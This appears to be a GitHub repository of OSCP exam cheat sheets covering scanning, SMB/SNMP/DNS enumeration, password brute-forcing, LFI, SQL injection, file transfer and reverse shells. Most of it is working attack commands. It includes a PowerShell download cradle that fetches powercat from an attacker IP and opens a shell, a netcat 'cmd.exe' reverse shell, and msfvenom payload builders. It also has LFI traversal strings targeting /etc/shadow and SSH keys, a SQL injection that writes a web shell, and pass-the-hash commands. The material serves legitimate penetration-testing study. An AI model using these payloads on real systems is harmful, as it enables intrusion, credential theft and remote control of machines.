Repository: omurugur/OSCP
Branch: main
Commit: 84e748a21063
Files: 12
Total size: 26.8 KB

Directory structure:
gitextract_s2w0yhy0/
├── File_Transfer
├── Index_Detection
├── LFI
├── LICENSE
├── Password_Attack
├── Port_Scan
├── Port_Scan_By_Ports
├── README.md
├── Reverse_Shell
├── Road_Map
├── SQLi
└── Useful_Resources

================================================
FILE CONTENTS
================================================

================================================
FILE: File_Transfer
================================================
#With Curl
curl http://XX.XX.XX.XX/test.sh --output test.sh
------------------------
#Paste the following code to get nc in the victim:
echo open 21> ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
nc.exe 1234 -e cmd.exe
------------------------
#Bounce port scanning
$ nc $ip 21
220 Femitter FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS foo
230 User anonymous logged in.
PORT 127,0,0,1,0,80
200 Port command successful.
LIST
------------------------
#Nice trick to share folders with RDP:
$ rdesktop (ip) -r disk:share=/home/bayo/store
------------------------
#With powershell:
$ powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\Users\YOURUSER\Desktop\b.exe')"
------------------------
#Paste the following block in a command line to get a web client:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Run with:
$ cscript wget.vbs http:///nc.exe nc.exe

================================================
FILE: Index_Detection
================================================
#GOBUSTER
• gobuster dir -u http://XX.XX.XX.XX/Customer/Info -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
------------------------
#with ssl GOBUSTER
• gobuster dir -u http://XX.XX.XX.XX -w /usr/share/wordlists/dirbuster -k
------------------------
#DiRB
• dirb url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
------------------------
#Davtest
• davtest -url http://XX.XX.XX.XX
------------------------
#WPScan
• wpscan -u https://omurugur.com/ --disable-tls-checks --enumerate p --enumerate t --enumerate u
• wpscan --url https://omurugur.com/ --disable-tls-checks --api-token
• wpscan --url https://omurugur.com/ -e ap

================================================
FILE: LFI
================================================
#Useful LFI files (null byte)
../../../../../etc/passwd%00
....//....//....//....//....//etc/passwd%00
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
------------------------
#Linux:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
------------------------
#Apache:
Configuration Files:
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
------------------------
#Log Files:
Red Hat/CentOS/Fedora Linux - /var/log/httpd/access_log
Debian/Ubuntu - /var/log/apache2/access.log
FreeBSD - /var/log/httpd-access.log
------------------------
#Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log
------------------------
#MySql:
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
------------------------
#Windows:
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
------------------------

================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2021 Ömür Uğur

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

================================================
FILE: Password_Attack
================================================
#SSH Attack with THC-Hydra
• hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
------------------------
#Remote Desktop Protocol Attack with Crowbar
• crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1
------------------------
#HTTP htaccess Attack with Medusa
• medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
------------------------
#HTTP POST Attack with THC-Hydra
• hydra XX.XX.XX.XX http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f

================================================
FILE: Port_Scan
================================================
#Nmap
• nmap -sC -sV -O -iP
• nmap -p- --min-rate 10000 -oA scans/alltcp XX.XX.XX.XX
• nmap -p- -v
• nmap -sT -sV -p- XX.XX.XX.XX -oA XX.XX.XX.XX
------------------------
#TCP Top 1000
• nmap -Pn -sC -sV -oA tcp -vv $ip
------------------------
#All TCP Ports:
• nmap -Pn -sC -sV -oA all -vv -p- $ip
------------------------
#UDP Top 100:
• nmap -Pn -sU --top-ports 100 -oA udp -vv $ip
• unicornscan -mU -v -I XX.XX.XX.XX
------------------------
#No Ping
• nmap -sV -sC -O -Pn XX.XX.XX.XX
------------------------
#All Port
• nmap -sV -sC -O -Pn -p 1-65535 XX.XX.XX.XX
------------------------
#Nmap Detect And Write Stand-up Servers
• nmap -v -sn XX.XX.XX.XX-254 -oG upHost.txt
------------------------
#UDP Scan
• nmap --top-ports 200 -sU -A XX.XX.XX.XX
------------------------
#With Netcat
• nc -nvv -w 1 -z XX.XX.XX.XX 3388-3390

================================================
FILE: Port_Scan_By_Ports
================================================
#SSH
• nmap -sV --script=ssh-* -p 22 XX.XX.XX.XX
------------------------
#SNMP
• sudo nmap -sU --open -p 161 XX.XX.XX.XX-254 -oG open-snmp.txt
• snmpwalk -c public -v1 -t 10 XX.XX.XX.XX
• snmp-check -t $ip -c public
• nmap -sU -p161 --script "snmp-*" $ip
------------------------
#Enumerating Windows Users
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.4.1.77.1.2.25
------------------------
#Enumerating Running Windows Processes
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.4.2.1.2
------------------------
#Enumerating Open TCP Ports
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.6.13.1.3
------------------------
#Enumerating Installed Software
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.6.3.1.2
------------------------
#SMTP
#telnet or netcat connection
• nc 25
• VRFY root
------------------------
#Check for commands
• nmap -script smtp-commands.nse
• nmap XX.XX.XX.XX -p 25 --script=smtp-*
• nc -nv XX.XX.XX.XX 25
------------------------
Command to check if a user exists
VRFY root
Command to ask the server if a user belongs to a mailing list
EXPN root
------------------------
#Always do users enumeration
• smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
• smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t $ip
------------------------
#SMB
------------------------
#Enumerate Hostname
- nmblookup -A $ip
#List Shares
• smbmap -H $ip
• echo exit | smbclient -L \\\\$ip
• nmap --script smb-enum-shares -p 139,445 $ip
• smbclient -N -L //XX.XX.XX.XX
------------------------
#Check Null Sessions
• smbmap -H $ip
• rpcclient -U "" -N $ip
• smbclient -N -L \\\\XX.XX.XX.XX\\
• smbclient \\\\$ip\\[share name]
• smbclient -L XX.XX.XX.XX --option='client min protocol=NT1'
• smbclient -L //XX.XX.XX.XX/ --option='client min protocol=NT1'
• smbclient \\\\XX.XX.XX.XX\\'bob share' --option='client min protocol=NT1'
------------------------
#Check for Vulnerabilities
- nmap --script smb-vuln* -p 139,445 $ip
------------------------
#Overall Scan
- enum4linux -a $ip
------------------------
#Manual Inspection
• smbver.sh $ip (port)
------------------------
#rpcclient
• rpcclient -U '' $ip
• Password:
• rpcclient $> srvinfo # operating system version
• rpcclient $> netshareenumall # enumerate all shares and its paths
• rpcclient $> enumdomusers # enumerate usernames defined on the server
• rpcclient $> getdompwinfo # smb password policy configured on the server
------------------------
#CrackMapExec
• crackmapexec -u 'guest' -p '' --shares $ip
• crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip
• crackmapexec -u 'guest' -p '' --users $ip
• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -p P@ssw0rd
• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz XX.XX.XX.XX/24
• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip # reliable pth code execution
------------------------
#smbmap
• smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
• smbmap -u guest -p '' -H $ip
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesn't work
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work
------------------------
# Share List:
• smbclient --list
• smbclient -L
• smbclient -L //XX.XX.XX.XX
------------------------
# SMB Client:
• smbclient //XX.XX.XX.XX/pathname
• smbclient -L //XX.XX.XX.XX
------------------------
# SMB Map:
• smbmap -H XX.XX.XX.XX
• smbmap -H XX.XX.XX.XX -R --depth 5
• smbmap -H htb.local -u -p
------------------------
# Check SMB vulnerabilities:
• nmap --script=smb-check-vulns.nse -p445
• nmap --script vuln XX.XX.XX.XX -p445
• nmap --script "vuln" -p139,445
------------------------
# basic nmap scripts to enumerate shares and OS discovery
• nmap -p 139,445 XX.XX.XX.XX/24 --script smb-enum-shares.nse smb-os-discovery.nse
• nmap --script smb-enum-shares.nse -p445 XX.XX.XX.XX
------------------------
# Connect using Username
• smbclient -L -U username -p 445
------------------------
# Connect to Shares
• smbclient \\\\\\ShareName
• smbclient \\\\\\ShareName -U User_name
------------------------
# enumerate with smb-shares, -a “do everything” option
• enum4linux -a XX.XX.XX.XX
• enum4linux -i XX.XX.XX.XX
------------------------
# learn the machine name and then enumerate with smbclient
• nmblookup -A XX.XX.XX.XX
• smbclient -L -I XX.XX.XX.XX
------------------------
# DNS ENUM
• dnsenum zonetransfer.me
------------------------
# DNS RECON
• dnsrecon -d okmurugur.com -t axfr
• dnsrecon -d XX.XX.XX.XX -r XX.XX.XX.XX/8
------------------------
# DNS ENUMERATiON
• host www.okmurugur.com
• host -t mx okmurugur.com
• host -t txt okmurugur.com
------------------------
# DiG
• dig axfr @XX.XX.XX.XX okmurugur.com

================================================
FILE: README.md
================================================

OSCP ( Offensive Security Certified Professional )

Overview

Penetration Testing with Kali Linux (PEN-200) is the foundational course at Offensive Security. Those new to OffSec or penetration testing should start here. This online ethical hacking course is self-paced. It introduces penetration testing tools and techniques via hands-on experience. PEN-200 trains not only the skills, but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the coveted Offensive Security Certified Professional (OSCP) certification. To learn more about the modules updated in 2020 and get answers to frequently asked questions, see the announcement blog post. You can find my experience of the OSCP certification exam, which I took and passed in 2021, on my site. I wish success to the friends who will take the exam.

References

• https://www.offensive-security.com/pwk-oscp/

Download

Cloning an Existing Repository ( Clone with HTTPS )

root@slife:~# git clone https://github.com/omurugur/OSCP.git

Cloning an Existing Repository ( Clone with SSH )

root@slife:~# git clone git@github.com:omurugur/OSCP.git

Contact

Mail : omurugur12@gmail.com
Linkedin : https://www.linkedin.com/in/omurugur-sibergüvenlik/
GitHub : https://github.com/omurugur
Twitter : https://twitter.com/omurugurrr
Medium : https://omurugur.medium.com/

Donate!

Support the authors:

================================================
FILE: Reverse_Shell
================================================
# Interactive TTY Shell
• python -c 'import pty; pty.spawn("/bin/sh")'
• python -c 'import pty;pty.spawn("/bin/bash")'
• python -c 'import pty; pty.spawn("/bin/bash")'
• /usr/bin/script -qc /bin/bash /dev/null
------------------------
# With Powershell
• powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://XX.XX.XX.XX/powercat.ps1');powercat -c XX.XX.XX.XX -p 9090 -e cmd"
------------------------
# Reverse Shell
#Linux
•msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf > shell.elf
# PHP
•msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw > shell.php
# ASP
•msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.216 LPORT=443 -f asp > shell.asp
# WAR
•msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war
# JSP
•msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp
# Exe
•msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=445 -f exe -o shell_reverse.exe
# ASPX
•msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f aspx > shell.aspx
# ASPX-x64
•msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=1234 -f aspx > 4.aspx
------------------------
#Shell From SQL Injection
•windows
?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
•linux
?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'

================================================
FILE: Road_Map
================================================
Network Scanning

Service Scanning

WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadaver
☐ droopescan
☐ joomscan
☐ LFI\RFI Test
☐ SQL injection
☐ Default password search

Linux\Windows
☒ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux

Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggester.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggester.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files

================================================
FILE: SQLi
================================================
#sqlmap
☐ sqlmap -r name.txt --batch --force-ssl
☐ sqlmap -r name.txt --dbms mysql --technique=U --dump --batch
☐ sqlmap -r name.txt --dbms mysql --technique=U --users
☐ sqlmap -r name.txt --dbms mysql --technique=U --passwords
☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --dump
☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --os-shell
------------------------

================================================
FILE: Useful_Resources
================================================
Blog :
My experience with the OSCP certification — Security Café
PWK and OSCP my experience | Fady Osman’s Technical Blog
Offensive Security’s PWB and OSCP — My Experience — Security SiftSecurity Sift
Penetration Testing With Backtrack — OSCP — Things all the hacking
Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)
OSCP Course and Exam Review — RCE Security
Try Harder! An OSCP Review. Blog of Jason Bernier
Pentest Tips and Tricks — EK
Open Security Research: Using Mimikatz to Dump Passwords!
Hacking/OSCP cheatsheet :: Ceso Adventures
The CORE Hacking Course — YouTube
Uploading a web.config File for Fun and Profit | Soroush Dalili (@irsdl) — سروش دلیلی
NetSecFocus Trophy Room — Google Drive

Enumeration :
oscp/linux-template.md at master · xapax/oscp
oscp/windows-template.md at master · xapax/oscp
CTF Series : Vulnerable Machines — tech.bitvijays.com
PWK Notes: SMB Enumeration Checklist [Updated] | 0xdf hacks stuff
nmapAutomator/nmapAutomator.sh at master · 21y4d/nmapAutomator

Privilege_Escalation_Windows:
Windows Privilege Escalation Guide
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows elevation of privileges
(1) Windows Privilege Escalation — AlwaysInstallElevated — YouTube
PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit
WindowsEnum/WindowsEnum.ps1 at master · absolomb/WindowsEnum
Windows-Exploit-Suggester/windows-exploit-suggester.py at master · AonCyberLabs/Windows-Exploit-Suggester
Windows Privilege Escalation Methods for Pentesters — Pentest Blog
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows Local Privilege Escalation — HackTricks
GhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.
Ghostpack-CompiledBinaries/SharpUp.exe at master · r3motecontrol/Ghostpack-CompiledBinaries
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
Ghostpack-CompiledBinaries/Seatbelt.exe at master · r3motecontrol/Ghostpack-CompiledBinaries
privilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite
bitsadmin/wesng: Windows Exploit Suggester — Next Generation
rasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities
SecWiki/windows-kernel-exploits: windows-kernel-exploits (collection of Windows privilege escalation vulnerabilities)
Neohapsis/creddump7
juicy-potato/README.md at master · ohpe/juicy-potato
antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to System
itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019

Privilege_Escalation_Linux:
sagishahar/lpeworkshop: Windows / Linux Local Privilege Escalation Workshop
Linux elevation of privileges
LinEnum/LinEnum.sh at master · rebootuser/LinEnum
Basic Linux Privilege Escalation
Linux Privilege Escalation Scripts
Linux Privilege Escalation — HackTricks
diego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
Linux Privilege Escalation Using Cronjobs
rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
linted/linuxprivchecker: linuxprivchecker.py — a Linux Privilege Escalation Check Script
AlessandroZ/BeRoot: Privilege Escalation Project — Windows / Linux / Mac
unix-privesc-check | pentestmonkey
jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester
Privilege Escalation Methods in Linux Penetration Tests | SİBER GÜVENLİK PORTALİ

Reverse_Shell:
reverseshell | pentestmonkey
netcat 1.11 for Win32/Win64
Upgrading Simple Shells to Fully Interactive TTYs — ropnop blog
Spawning a TTY Shell
Reverse Shell Cheat Sheet | pentestmonkey
Reverse Shell Cheat Sheet
Remote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-Shell

BOF:
PWK/OSCP — Stack Buffer Overflow Practice — vortex’s blog
Exploiting the Stack-Based Buffer Overflow Vulnerability in Seattle Lab Mail (SLmail) 5.5 | SİBER GÜVENLİK PORTALİ
(1) Buffer Overflow Exploitation (Minishare & FreeFloat) — YouTube
justinsteven/dostackbufferoverflowgood
jessekurrus/slmailsploits: Several Python scripts used to fuzz and exploit SLmail. These are meant to supplement the Kali Linux Hands-on Pentesting Udemy course.
(2) Immunity Debugger Overview — YouTube
Stack Based Buffer Overflow in Win 32 Platform: The Basics
Stack Buffer Overflow Vulnerability — PCMan FTP Server 2.0.7 | Ahmet GÜREL
Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]
Zero Day Zen Garden: Windows Exploit Development — Part 4 [Overwriting SEH with Buffer Overflows]
Buffer Overflow — Easy Chat Server 3.1 — OnSecurity
Buffer Overflow Exploit Development ~ BTRiskBlog Everything About Pentest, ISO27001 and IT Audit
Coalfire — The Basics of Exploit Development 1: Win32 Buffer Overflows
Coalfire — Coalfire Blog
Coalfire — Coalfire Blog
Customized Mail Server Software Buffer Overflow on Windows Server 2008 | by Rudy Samuel Pardosi | Medium
A Simple Buffer Overflow Using Vulnserver | by Z3R0th | Medium
Finding Bad Characters with Immunity Debugger and Mona.py — Bulb Security
minishare 1.4.1 exploit — YouTube

SQLI:
SQL-Injections · Security — My notepad
44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf
Full MSSQL Injection PWNage
MSSQL Practical Injection Cheat Sheet — Perspective Risk
SQL Injection Cheat Sheet | Netsparker
Öner KAYA: Advanced SQL Injection Operations (Advanced Sql Injection)
Red Team Tales 0x01: From MSSQL to RCE — Tarlogic Security — Cyber Security and Ethical hacking
SQL Injection Cheat Sheet | Bhanu Notes
SQL-Injections · Total OSCP Guide
SQL Tutorial

LFI:
Hack The Box — Poison Writeup w/o Metasploit | by Rana Khalil | The Startup | Medium
(7) HackTheBox — Poison — YouTube